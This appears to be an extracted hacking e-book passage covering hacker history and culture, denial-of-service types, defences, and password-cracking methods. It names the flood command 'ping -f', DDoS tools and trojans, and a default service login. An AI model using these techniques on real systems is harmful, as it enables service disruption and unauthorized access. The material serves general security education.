Vous êtes sur la page 1sur 181

Hacking

Click To Enter The Venture

Index

Evolution Hacking Hacking Introduction To- Cyber Crime Special Attraction Viruses Hacking XP Glossary Prepared By
3

Back

Evolution of Hacking
Astonishingly, hacking did not instigate as an antisociety activity. The entire story of hacking started with the belief that there is always more than one way to solve a problem. People also wanted to admittance the information free of cost at any time. Computer hacking started in the late 1950s. Before that, computers and programming languages were not easily easily reached. Problems were solved by repeating known and successful computing methods. To Work on computers, people needed formal problems and predesigned solutions. Computers were allotted to professionals based on priority of their requirements. The restricted use of computer resources reduced the chances for any experiments with early computers. The authorities of Massachusetts Institute of Technology (MIT) allowed people to access their TX-0 resources without any restrictions after official hours. That was the first time when computer users got a chance to experiment with different methods for solving problems. In other words, that was the beginning of the hacker community. However, the prime aim of those hackers was to experiment with new solutions without any malevolent intent. The earlier hackers performed their activities with a strong belief that there is always a space for enhancement. They performed their activities without any predefined structure and time schedules. In parallel to the computers hacking activities, a new type of hackers, phreaks, came into existence. Phreaks first accessed telephone networks by using handheld electronic devices. Phreaks used those devices to make modifications to pay telephones to make free telephone calls. To try to be like payments in pay telephones, they used devices, such as red boxes. In the early 1980s, a new computing era started by connecting computers and telephone networks with the help of modems. Personal computers became popular. Users started to use modems and telephone networks to connect personal computers and mainframe computers. The access to the computers connected to the internet opened the entire world of computers to the hackers community. The rapid growth of the internet technologies changed the profile of hackers.

Back
5

Index

What Is Hacking? How Do Hackers Hack? Classes Of Hacker How To Became Hacker? Common Hacking Techniques Passwords Sniffers: Basics and Detection
7

Back

What is Hacking?
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.

What are Hackers?


Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Such a definition presents the term in a more positive light than is usually associated with the term. Most people understand a hacker to be what is more accurately known as a 'cracker'

What are Crackers?


Crackers are people who try to gain unauthorized access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer.

What damage can a Hacker do?


This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information

Back

10

11

How do Hackers hack?


There are many ways in which a hacker can hack. Some are as follows * NetBIOS * ICMP Ping * FTP * rpc.statd * HTTP

NetBIOS
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely.

ICMP Ping (Internet Control Message Protocol)


ICMP is one of the main protocols that make the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer.

FTP (File Transfer Protocol)


FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files FTP backdoor programs, such as* Doly Trojan 12

* Fore * Blade Runner simply turn your computer into an FTP server, without any authentication.

Rpc.Statd
This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds.

HTTP
HTTP stands for HyperText Transfer Protocol.. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, part of the request gets written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server.

Back

13

14

Classes of Hackers
Today, it is very difficult to distinguish between hackers, crackers, and script kiddies. Therefore, hackers have been categorized into different groups based on the nature of their tricks: White hats Black hats Gray hats

White Hats
White hat hackers use their skills and knowledge for good purposes. These hackers help to find out new security vulnerabilities and their solutions. White hats do not hack systems with any bad intent. They like experimenting and believe that there is always a better solution than the current one. White hat hackers always inform the vulnerabilities they discovered to the concerned security professionals weakness of that system and help the system administrator to implement better security measures is a White hat hacker.

Black Hats
Black hat hackers perform their activities with bad intentions. Black hats perform illegal activities, such as destroying data, denying services to legitimate users, and defacing Web sites. For example, a hacker who breaks into the network of a bank and steals thousands of dollars by transferring it to other banks is a black hat. Black hat hackers share their experiments with other crackers but not with the concerned security professionals.

Grey Hats
Gray hat hackers are those people who do not believe in categorizing hacking activities as good or bad. Gray hats believe that some of the activities, which are condemned by white hats, are harmless. Gray hat hackers might share the results of their experiments with both security professionals and crackers.

15

The Hacker Attitude


Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. They're also important because becoming the kind of person who believes these things is important, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz) So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.


Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. ( so I would take it all hackers are wankers lol ).You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done. ( I agree )

2. Nobody should ever have to solve a problem twice.


Creative brains are a valuable, limited resource. They shouldn't be wasted on reinventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do that get the most respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent 16

and computers. It's OK to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.


Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)

4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like cooperation that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.


To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. 17

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker.

Back

18

19

How To Become A Hacker


Looking for advice on learning to crack passwords, sabotage systems, mangle websites, write viruses, and plant Trojan horses? You came to the wrong place. Looking for advice on how to learn the guts and bowels of a system or network, get inside it, and become a real expert? Maybe I can help there. How you use this knowledge is up to you. I hope you'll use it to contribute to computer science and hacking (in its good sense), not to become a cracker or vandal. This little essay is basically the answers to all the emails I get asking how to become a hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a try and see what happens. That said, here's where to start: Be curious Take things apart. Look under the hood. Dig through your system directories and see what's in there. View the files with hex editors. Look inside your computer. Wander around computer stores and look at what's there. Read everything in sight If you can afford it, buy lots of books. If you can't, spend time in libraries and online. Borrow books from friends. Go through tutorials. Read the help files on your system. If you're using Unix/Linux, read the man files. Check out the local college bookstores and libraries. And as you're reading, try things (see next paragraph). Experiment Don't be afraid to change things, just to see what'll happen. Do this long enough, of course, and you'll wipe out your system (see next paragraph), but that's part of becoming a hacker. Try command options and switches you've never tried before. Look for option menus on programs and see what they can do. In Windows, tweak your registry and see what happens. Change settings in .INI files. In Unix, dig around in the directories where you don't normally go. On the Macintosh, play around in the system folder.

20

Make backups If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer. Don't limit yourself Who says a computer or network is the only place to hack? Take apart your telephone. Figure out your television (careful of the high voltage around the picture tube - if you fry yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be insatiably curious and read voraciously. There are groups you can learn from. There are whole Web sites devoted to hacking TiVo units, for example. Get some real tools You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a long time. Dig around and find the proper tools for the operating systems you're using. They're out there on the Web. You can get some pretty good stuff as shareware or freeware (especially on Linux). The serious power tools often cost serious money. What kinds of tools? Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get good, write some of your own. Learn to program If you want to be a hacker, you're going to have to learn to program. The easiest way to start depends on the operating system you're using. The choice of language is very individual. It's almost a religious thing. Suggest a programming language to a beginner, and someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the llama book (Learning Perl). You'll have the fundamentals of programming really fast! The 21

best part is that the language itself is free. In Windows, you can get started quickly using a visual development environment like Visual Basic or Java. No matter what the system, if you want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant). Real hackers know more than one programming language, anyway, because no one language is right for every task. Learn to type Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame) says he can type 140+ wpm. The typing tutor may be boring, but it pays off. Use real operating systems Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call yourself a linguist if you only know one language, and you certainly can't call yourself a hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to Linux yourself. Who knows, you might even have a chance to write your own OS. Talk to people It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk to people on IRC or newsgroups or Web boards until you find people to learn with. That can take a while. Every third message on newsgroups like alt.hack* is "teach me to hack." Sigh. The best way to be accepted in any group is to contribute something. Share what you learn, and others will share with you. Do some projects It's important to pick some projects and work until you've finished them. Learning comes from doing, and you must follow the project through start to finish to really understand it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or the prompt on Unix). Make a script that performs some common operation. Write a program that manipulates a file (try encrypting something). 22

Learn to really use the Internet Start with the Web. Read the help for the search engines. Learn how to use Boolean searches. Build up an awesome set of bookmarks. Then move on to other Internet resources. Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in the strangest places. Get to the point where you can answer your own questions. It's a whole lot faster than plastering them all over various newsgroups and waiting for a serious answer. Once you've gone through these steps, go out and contribute something. The Internet was built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built by hackers. Be one of the hackers that builds something.

Back

23

24

Common Hacking Techniques


The Various Hacking techniques include: Denial-of-service Trojan Horses Spoofing Sniffing Password Cracking

Denial-Of-Service attacks
Methods of attacks A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include: Attempts to "flood" a network, thereby preventing legitimate network traffic; Attempt to disrupt a server by sending more requests than it can possibly handle, thereby preventing access to a service; Attempts to prevent a particular individual from accessing a service; Attempts to disrupt service to a specific system or person. Attacks can be directed at any network device, including attacks on routing devices and Web, electronic mail, or Domain Name System servers. A DOS attack can be perpetrated in a number of ways. There are three basic types of attack: 1. Consumption of computational resources, such as bandwidth, disk space, or CPU time; 2. Disruption of configuration information, such as routing information; 3. Disruption of physical network components. In addition, the US-CERT has provided tips on the manifestations of DoS attacks: Unusually slow network performance (opening files or accessing web sites) Unavailability of a particular web site Inability to access any web site Dramatic increase in the number of spam emails received

25

SYN floods
Main article: SYN flood A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets are handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for an TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections consume resources on the server and limit the number of connections the server is able to make, reducing the server's ability to respond to legitimate requests until after the attack ends. When a computer wants to make a TCP/IP connection (the most common internet connection) to another computer, usually a server, an exchange of TCP/SYN and TCP/ACK packets of information occur. The computer requesting the connection, usually the client's or user's computer, sends a TCP/SYN packet which asks the server if it can connect. If the server will allow connections, it sends a TCP/SYN-ACK packet back to the client to say "Yes, you may connect" and reserves a space for the connection, waiting for the client to respond with a TCP/ACK packet detailing the specifics of its connection. In a SYN flood the address of the client is often forged so that when the server sends the go-ahead back to the client, the message is never received because the client either doesn't exist or wasn't expecting the packet and subsequently ignores it. This leaves the server with a dead connection, reserved for a client that will never respond. Usually this is done to one server many times in order to reserve all the connections for unresolved clients, which keeps legitimate clients from making connections. The classic example is that of a party. Only 50 people can be invited to a party, and invitations are available on a first-come first-serve basis. Fifty letters are sent to request invitations, but the letters all have false return addresses. The invitations are mailed to the return addresses of the request letters. Unfortunately, all of the return addresses provided were fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone actually wants to come to the party (view the website), there are no invitations left because all the invitations (connections) have been reserved for 50 supposed people who will never actually show up.

26

LAND attack
Main article: LAND attack A LAND attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address with an open port as both source and destination. The attack causes the targeted machine to reply to itself continuously and eventually crash. ICMP floods A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering. Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

UDP floods
UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large amount of UDP echo traffic to IP broadcast addresses, all of it having a fake source address. It is a simple rewrite of the smurf attack code.

Teardrop attack
The Teardrop attack involves sending IP fragments with overlapping oversized payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused the fragments to be improperly handled, crashing the operating system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to 2.0.32 and 2.1.63 are vulnerable to this attack. Application level floods On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time. 27

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb. A 'Pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to their surreptitious nature.

Nukes
Nukes are malformed or specially crafted packets. WinNuke is a type of nuke, exploiting the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to lock up and display a Blue Screen of Death. This attack was very popular between IRCdwelling script kiddies, due to easy availability of a user-friendly click-and-crash WinNuke program.

Distributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually a web server(s). These systems are compromised by attackers using a variety of methods. Malware can carry DDoS attack mechanisms; one of the more well known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack. 28

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents. These collections of compromised systems are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered around ip spoofing and amplification like smurf and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. (see next section) Unlike MyDooms DDoS mechanism, botnets can be turned against any ip address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals. It is important to note the difference between a DDoS and DoS attack. If an attacker mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any attack against availability (e.g. using High-energy radio-frequency weapons to render computer equipment inoperable) would be classed as a Denial of Service attack, albeit an exotic one. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classed as a DDoS attack.

Reflected attack
A distributed reflected denial of service attack involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. ICMP Echo Request attacks (described above) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis29

configured networks, thereby enticing a large number of hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.

Unintentional attack
This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users potentially hundreds of thousands of people click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. News sites and link sites sites whose primary function is to provide links to interesting content elsewhere on the Internet are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", "farking", "goonrushing" and "wanging"; respectively. Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have created NTP vandalism by flooding NTP servers without respecting the restrictions of client types or geographical limitations. Incidents The first major attack involving DNS servers as reflectors occurred in January 2001. The attack was directed at the site Register.com. This attack, which forged requests for the MX records of AOL.com (to amplify the attack) lasted about a week before it could be traced back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that was at least a year old (at the time of the attack.) In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was analyzed turned out to be yet another DDoS agent, which implemented several DNS related attacks, including an optimized form of a reflection attack...

30

Effects
Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted. This is another, more complex form of the DDoS, wherein the "zombies" can be located on the target system itself, thus increasing network traffic on either side of the target. If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice. Common malware Stacheldraht Tribe Flood Network Trinoo

Prevention and response

Surviving attacks
The investigative process should begin immediately after the DoS attack begins. There will be multiple phone calls, call backs, emails, pages and faxes between the victim organization, one's provider and others involved. It is a time consuming process, so the process should begin immediately. It has taken some very large networks with plenty of resources several hours to halt a DDoS. The easiest way to survive an attack is to have planned for the attack. Having a separate emergency block of IP addresses for critical servers with a separate route can be invaluable. A separate route (perhaps a DSL) is not that extravagant, and it can be used for load balancing or sharing under normal circumstances and switched to emergency mode in the event of an attack. Filtering is generally pretty ineffective, as the route to the filter will normally be swamped so only a trickle of traffic will survive.

31

SYN Cookies
SYN cookies modify the TCP protocol handling of the server by delaying allocation of resources until the client address has been verified. This seems to be the most powerful defense against SYN attacks. There are solaris and Linux implementations. The linux implementation can be turned on during runtime of the linux kernel.

Firewalls
Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. DoS attacks are too complex for today's firewalls. E.g. if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy. Your router may be affected even before the firewall gets the traffic. Modern stateful firewalls like Check Point FW1 NGX & Cisco PIX have a built-in capability to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender", as it confirms TCP connections are valid before proxying TCP packets to service networks (including border routers).

Switches
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN Link failover and balancing. These schemes will work as long as the DoS attacks are something that can be prevented using them. For example SYN flood can be prevented using delayed binding or TCP splicing. Similarly content based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS prevention mechanism.

32

Routers
Similar to switches, routers have some rate-limiting and ACL capability. They too are manually set. Most routers can be easily overwhelmed under DoS attack. If you add rules to take flow statistics out of the router during the DoS attacks, they further slow down and complicate the matter. Cisco IOS has features that prevents flooding, i.e. example settings

Application front end hardware


Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management. Look for granularity of bandwidth management, hardware acceleration, and automation while selecting an appliance.

IPS based prevention


Intrusion-prevention systems are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. IPS systems which work on content recognition cannot block behavior based DoS attacks. An ASIC based IPS can detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.

Back

33

34

Passwords
Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to login. To preserve confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or cryptographic hash) does not incorporate a secret key, other than the password, we will refer to the one way function employed as a hash and its output as a hashed password. Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess, and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered. The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords. Password cracking requires that an attacker can gain access to a hashed password, either by reading the password verification database (e.g., via a Trojan Horse, virus program, or social engineering) or intercepting a hashed password sent over an open network, or has some other way to rapidly and without limit test whether a guessed password is correct. Without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However well designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded. With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances for cracking at least one is quite high. There are also many other ways of obtaining passwords illicitly, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, identity management system attacks and compromising host security (see password for details). However, cracking usually designates a guessing attack. 35

Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed-passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zeroknowledge password proof.

Principal attack methods


Weak encryption If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick operation, and can be conducted while not connected to the target system. Any 'cracking' technique of this kind is considered successful if it can decrypt the password in fewer operations than would be required by a brute force attack (see below). The fewer operations required, the "weaker" the encryption is considered to be (for equivalently well chosen passwords). One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Progress in cryptography has made available functions which are believed to actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to invert in practice. When quality implementations of good cryptographic hash functions are correctly used for authentication, password cracking through decryption can be considered infeasible.

Guessing
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include: blank (none) the word "password", "passcode", "admin" and their derivates the user's name or login name the name of their significant other or another relative their birthplace or date of birth 36

a pet's name automobile licence plate number a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters. a row of letters from a standard keyboard layout (eg, the qwerty keyboard -qwerty itself, asdf, or qwertyuiop) and so on.

Some users even neglect to change the default password that came with their account on the computer system. And some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account. The determined cracker can easily develop a computer program that accepts personal information about the user being attacked and generates common variations for passwords suggested by that information.

Dictionary attack
A dictionary attack also exploits the tendency of people to choose weak passwords, and is related to the previous attack. Password cracking programs usually come equipped with "dictionaries", or word lists, with thousands or even millions of entries of several kinds, including: words in various languages names of people places commonly used passwords

The cracking program encrypts each word in the dictionary, and simple modifications of each word, and checks whether any match an encrypted password. This is feasible because the attack can be automated and, on inexpensive modern computers, several thousand possibilities can be tried per second. Guessing, combined with dictionary attacks, have been repeatedly and consistently demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all account passwords on production systems. 37

Brute force attack


A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But, how small is too small? A common current length recommendation is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices. Generic brute-force search techniques can be used to speed up the computation. But the real threat may be likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8 character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note: This number is very far less than what is generally considered to be safe for an encryption key. How small is too small thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose. The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be 